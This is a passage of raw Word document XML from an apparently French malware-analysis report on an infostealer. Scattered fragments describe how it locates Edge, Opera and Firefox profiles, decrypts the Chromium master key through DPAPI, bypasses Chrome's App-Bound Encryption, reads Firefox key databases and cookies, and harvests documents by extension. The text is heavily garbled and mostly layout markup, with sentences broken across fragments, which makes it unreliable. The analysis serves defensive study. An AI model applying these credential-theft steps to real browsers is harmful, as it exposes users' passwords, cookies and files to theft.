              <wp:posOffset>2016760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5980653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2918840" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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884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%LOCALAPPDATA%\Microsoft\Edge\User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53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6092213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="966842" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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68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Microsoft Edge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6336" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2016760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6195918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362609" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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60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Data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7360" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2016760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6585808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3058261" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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826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%APPDATA%\Opera Software\Opera Stable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83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6589418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="424107" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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10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Opera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9408" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2016760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6975698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2813087" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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308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%APPDATA%\Mozilla\Firefox\Profiles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04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6979308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="935807" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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80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Mozilla Firefox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1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7590178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Pour chaque na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vigateur basé s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ur Chromium (Chrome, Edge, Opera), le logiciel malveillant lit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2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7782148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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 fichier JSON </w:t>
                        </w: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Local State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et extrait la clé principale protégée par DPAPI via la fonction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350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7997413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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CryptUnprotectData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 Il collecte ensuite les données de connexion (mots de passe) et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4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8194063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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cookies de chaque profil, ainsi que la clé princ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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ipale déc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hiffr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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ée. Pour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Firefox, le logiciel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5552" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4845684</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8386033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1890278" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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027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key4.db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, ainsi que le fichier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6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8386033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3961991" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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6199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malveillant lit les bases de données de clés NSS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key3.db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7600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8601298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3792484" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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48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cookies.sqlite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présent dans chaque répertoire de profil.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8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8918163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5879210" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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92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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">info stealer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 extrait également la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app_bound_encrypted_key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du fichier </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="-2"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Local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964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9133428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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State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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> de Chrome. À partir de la version 127, Chrome utilise ce champ pour mettre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0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9330078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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œuvre le chiffrement lié à l’application (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App-Bound Encryption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= ABE), une protection qui lie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1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9503433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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 déchiffrement des identifiants au contexte de l’application Chrome. Google a introduit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272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374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47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579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681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3109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3100079</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="351154"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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3511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351154">
                          <a:moveTo>
                            <a:pt x="1116330" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1116330" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1116330" y="351154"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1115695" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1115695" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="351154"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1116330" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1116330" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1116330" y="351154"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1115695" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1115695" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="35115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19104" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2052319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5012699</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362585" cy="198755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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585" cy="1987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585" h="198755">
                          <a:moveTo>
                            <a:pt x="0" y="198755"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="362585" y="198755"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="362585" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="198755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036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3100079</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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3181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3181350">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="3181350"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3178175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="3178175"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2653665"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2263775"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2263775"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1873885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1873885"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1483995"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1483995"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="959484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="959484"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="354965"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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1392" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2016760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3106429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="3168650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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168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168650">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="316865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2416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3100079</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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181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181350">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="318135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163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38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5728" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5848349</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2397769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773429" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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42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429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772794" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772794" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77342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5596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2613669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5725159" cy="1078230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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159" cy="10782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159" h="1078230">
                          <a:moveTo>
                            <a:pt x="5724524" y="878840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5724524" y="1078230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1151889" y="879475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5725159" y="879475"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1501774" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1501774" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1863725" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1863725" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1501139" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1864359" y="63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263015" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1263015" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="126364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2592" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2052319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3492509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3637280" cy="2566670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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7280" cy="2566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7280" h="2566670">
                          <a:moveTo>
                            <a:pt x="635" y="2566670"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="2367280"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3227704" y="2367280"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3227704" y="2566670"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="2367915"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3228340" y="2367915"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="2109470"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="1910079"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2818765" y="1910079"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2818765" y="2109470"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1910715"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2819400" y="1910715"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="1719580"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="1520189"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363220" y="1718945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1718945"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="362585" y="1520189"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="362585" y="1719580"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1520824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363220" y="1520824"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="1329690"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="1130300"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3063875" y="1130300"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3063875" y="1329690"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1130934"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3064509" y="1130934"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="872489"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="673100"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3636644" y="673100"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3636644" y="872489"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="673735"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3637280" y="673735"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1509395" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1509395" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1510030" y="216535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7712" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1332230</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8072129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2967990" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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799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7990" h="199390">
                          <a:moveTo>
                            <a:pt x="2967354" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2967354" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1621789" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2967990" y="635"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1162684" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1162684" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="116331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9760" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2954655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8072129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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93856" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5761990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8072129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="899159" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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915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9159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898524" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="898524" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="89915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4096" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1350010</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8288029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2661919" cy="800099"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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1919" cy="800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61919" h="800099">
                          <a:moveTo>
                            <a:pt x="2661285" y="600709"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2661285" y="800099"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1398269" y="601344"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2661919" y="601344"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="995045" y="584199"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="995045" y="384809"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1929765" y="384809"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1929765" y="584199"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="994409" y="385444"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1930400" y="38544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720214" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1720214" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="172085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6144" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2748915</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8888739</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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716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819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9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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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l’ABE spécifiquement pour réduire l’efficacité des logiciels malveillants de type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infostealer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0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3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mais le contournement de l’ABE a été adopté dans de nombreux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infostealers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depuis fin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1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1304555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2024, et sa présence dans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 indique que le développeur suit de près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2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1487193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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évolutions en matière de sécurité des navigateurs et qu’il a peut-être emprunté des idées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3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1660548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1899168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9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l’écosystème des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infostealers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4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2057193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2336347" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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6347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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.2. Vol de documents et de fichiers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5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2382150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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Au-delà des données du navigateur,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 analyse les répertoires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Documents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638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2598643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Téléchargements</w:t>
                        </w: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 et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TEMP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de la victime à la recherche de fichiers correspondant à 35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7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2795293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="780856" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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085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extensions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8432" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3967479</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3111523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="780901" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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090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Extensions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9456" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1137920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3111523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="679758" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7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Catégorie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0480" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3478118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4565065" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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506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6"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">.txt, .doc, .docx, .docm, .rtf, .dot, .dotx, .dotm, .od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15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3589678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="741904" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9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Documents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2528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3693383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1506333" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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63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t, .pdf, .md, .log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35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4067833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1122563" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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25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Feuilles</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="23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8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4576" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4150583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3629913" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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991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.xls, .xlsx, .xlsm, .xlt, .xltx, .xltm, .csv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56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4241188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="392817" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8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calcul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6624" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4607783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3058261" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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826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.ppt, .pptx, .pptm, .pps, .ppsx, .pot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76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4611393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="889706" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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97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Presentations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8672" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4997673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362609" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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60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.eml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96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5001283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="384994" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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49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Email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0720" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
